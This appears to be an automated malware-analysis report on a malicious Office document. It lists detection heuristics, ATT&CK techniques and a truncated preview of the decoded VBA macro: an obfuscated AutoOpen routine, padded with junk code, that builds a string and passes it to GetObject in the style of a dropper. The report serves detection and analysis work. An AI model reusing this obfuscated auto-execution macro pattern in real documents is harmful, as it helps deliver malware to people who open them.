MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. Heuristics indicate the use of GetObject, suggesting an attempt to execute code or load external resources. The presence of a VBA macro with auto-execution capabilities strongly implies a downloader or dropper functionality, aiming to fetch and run a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6935045-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6935045-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6952 bytes |
SHA-256: 51bf0fd8e89a57ddabd31c014d8f5f9051b20a11cf22535e823f24dbb4f76883 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OCAoDoQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dDBAAAAB"
Attribute VB_Base = "0{EBFDFC19-B7BF-418A-97FE-AB632A05B910}{7795F890-6BF8-4739-AAEE-3776333732ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "YcAACGXo"
Attribute VB_Base = "0{49255DC2-CEAC-4F8F-BF71-AF58B31CE62B}{3FCA97B8-0E60-4194-ACE6-379473253605}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "CZU_BA41"
Function MAcwxQD()
If rBUAUAA > vAGUGAAA Then
HDDQ1AAB = 199577434 - AAAUZQU
If oAZDXAA < sU1UZDA Then
Day Atn(Bo4QAwo)
End If
End If
Set zXXoA4 = tcDBZo
If HQGkUA > YAAkAx Then
fAACAAB = 574569904 - mcQUAQ
If EUGAAAA < HwAUGCQA Then
Day Atn(rDwk__AU)
End If
End If
Set PoQACAoG = vUAADAZA
End Function
Sub autoopen()
uADADGQB
End Sub
Function S11DAx()
If WAXAAAAw > KBxcUAAA Then
pcAXAAA = 239042529 - NAAQUXUX
If dkCAAwXU < bUXCc_ Then
Day Atn(VQXAxAA)
End If
End If
Set dQAAUQ = BwDxAAkA
If K_1GBAD > zUwUxC Then
lAACQAA = 382264621 - C4AGZkX
If cUQcBDA1 < EZAAD_4U Then
Day Atn(N1UAAG11)
End If
End If
Set aDxDkX = dAACUD
End Function
Attribute VB_Name = "sACUAZ"
Function TAADDXCB()
If kZAXAwA_ > PGk4GG Then
kAAAAZU = 758398612 - tAB4AXQ
If N4GADGxQ < sGA14A Then
Day Atn(fkZAAoB)
End If
End If
Set kACDUAB = hDGoCB
If DXA_QA > rXADA4A Then
ABZDUB = 812821125 - wAxBQAQ1
If oUB_A1A < PcXABAB Then
Day Atn(jACZBZ)
End If
End If
Set OAA1AUU = WUUQAQ_
If VBAkAGA > p_kBDA Then
LAk1oDU4 = 356228888 - wUACUDwc
If iBX_ADU < iAXGAADA Then
Day Atn(ZADA_4cQ)
End If
End If
Set HX4ABAC = O1QAAB
End Function
Function uADADGQB()
On Error Resume Next
If WoAAAAAc > QUwDACD Then
FoBAQUG = 659060732 - KAABQ4B
If sQAAcA < K_owQQ Then
Day Atn(swZDBc)
End If
End If
Set X_DB_ZG = wAXc4A
If MkDA1cBQ > kkXcAoA Then
ACwAAxXA = 735108109 - XADUB1
If CBDAwCX < D1AACXD Then
Day Atn(w1DBkA)
End If
End If
Set OAAAAQ1_ = kxocQAD
hBk1_XAC = YcAACGXo.McxAwB + YcAACGXo.qXxAZAkA + YcAACGXo.McxAwB + YcAACGXo.fZkXD1GU + YcAACGXo.McxAwB
If fQAAkAQ > YAA1BAD Then
k_AADocD = 301118368 - cAwA1AAG
If aAAoAZBQ < pDA44AX Then
Day Atn(CCCQxQ)
End If
End If
Set wZAGAcX = cAUk1_c
If JABAAwA > lGDAAA Then
iXDAAAcc = 697559481 - NUABAX
If nD4UZxBA < AAAxUCA Then
Day Atn(NBABcxB)
End If
End If
Set qAAAAU = YoxwwBDU
Set VAAAQCG = GetObject(YcAACGXo.McxAwB + YcAACGXo.qXxAZAkA + YcAACGXo.McxAwB + YcAACGXo.fZkXD1GU + YcAACGXo.McxAwB + YcAACGXo.AAAx_GB + YcAACGXo.McxAwB)
If sAZA4AA > AUX1xGA Then
a4wwXAUB = 819632414 - tU1BkAUA
If SQBGAQ_w < bZ4AAU Then
Day Atn(BQcDcQ)
End If
End If
Set jAXc1AX = TBAQA4AZ
If zcZB_AA > LACoB1 Then
OAxAQQAQ = 350164482 - wcBAxwAA
If iZABAxQA < zADQZA Then
Day Atn(XAkAXQ)
End If
End If
Set GAGAGAA = jQAA1ABA
If sxBwAUc > JwAxQUA1 Then
GQ_BcZBU = 363408916 - PAQQ_AQU
If L_GA_AAB < cDXUxUA Then
Day Atn(QAXkoUAA)
End If
End If
Set OoBXAA = bQkAGAAA
If 352177 = 352177 Then
If ZBZADAAA > uQD_GQDZ Then
EGAAcQQ = 28786758
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.